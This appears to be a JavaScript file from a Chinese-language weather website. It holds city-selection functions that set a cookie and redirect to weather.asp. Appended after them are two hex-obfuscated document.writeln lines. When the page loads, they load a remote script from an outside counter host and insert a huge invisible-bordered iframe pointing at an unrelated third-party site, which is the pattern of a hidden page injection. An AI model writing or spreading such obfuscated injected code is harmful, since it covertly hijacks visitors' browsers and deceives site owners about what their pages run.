//
function getcity(u)
  {

  var time;
  var date;
  var obj = document.getElementById("city3");
  var strsel = obj.options[obj.selectedIndex].text;
  if (strsel=="县"){
  alert ("请选择您要定制的城市");
  }
  else {
  var ogg = document.getElementById("city4");
  var std = ogg.options[ogg.selectedIndex].text;
  time=new Date();
  time.setTime(time.getTime()+365*24*60*60*1000*10);
  date=time.toGMTString();
document.cookie = '_weather_city4=' + escape(std)+ ';expires='+date;

window.location.href="weather.asp?"+u;

 }
}
function getcity2(u)
  {
  
  window.location.href="weather.asp?"+u;
  }
//

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x63\x6f\x75\x6e\x74\x31\x36\x2e\x35\x31\x79\x65\x73\x2e\x63\x6f\x6d\/\x63\x6c\x69\x63\x6b\x2e\x61\x73\x70\x78\x3f\x69\x64\x3d\x31\x36\x39\x33\x31\x30\x37\x34\x35\x26\x6c\x6f\x67\x6f\x3d\x31\" \x63\x68\x61\x72\x73\x65\x74\x3d\"\x67\x62\x32\x33\x31\x32\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x66\x72\x61\x6d\x65 \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\"\x30\" \x6d\x61\x72\x67\x69\x6e\x68\x65\x69\x67\x68\x74\x3d\"\x30\" \x6d\x61\x72\x67\x69\x6e\x77\x69\x64\x74\x68\x3d\"\x30\" \x62\x6f\x72\x64\x65\x72\x3d\"\x30\" \x73\x63\x72\x6f\x6c\x6c\x69\x6e\x67\x3d\"\x6e\x6f\" \x68\x65\x69\x67\x68\x74\x3d\"\x38\x31\x38\x38\x70\x78\" \x77\x69\x64\x74\x68\x3d\"\x31\x30\x30\x25\"  \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x32\x37\x30\x37\x39\x2e\x63\x6f\x6d\/\x23\x31\x68\x61\x6f\"\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e\x3c\/\x63\x65\x6e\x74\x65\x72\x3e"); 
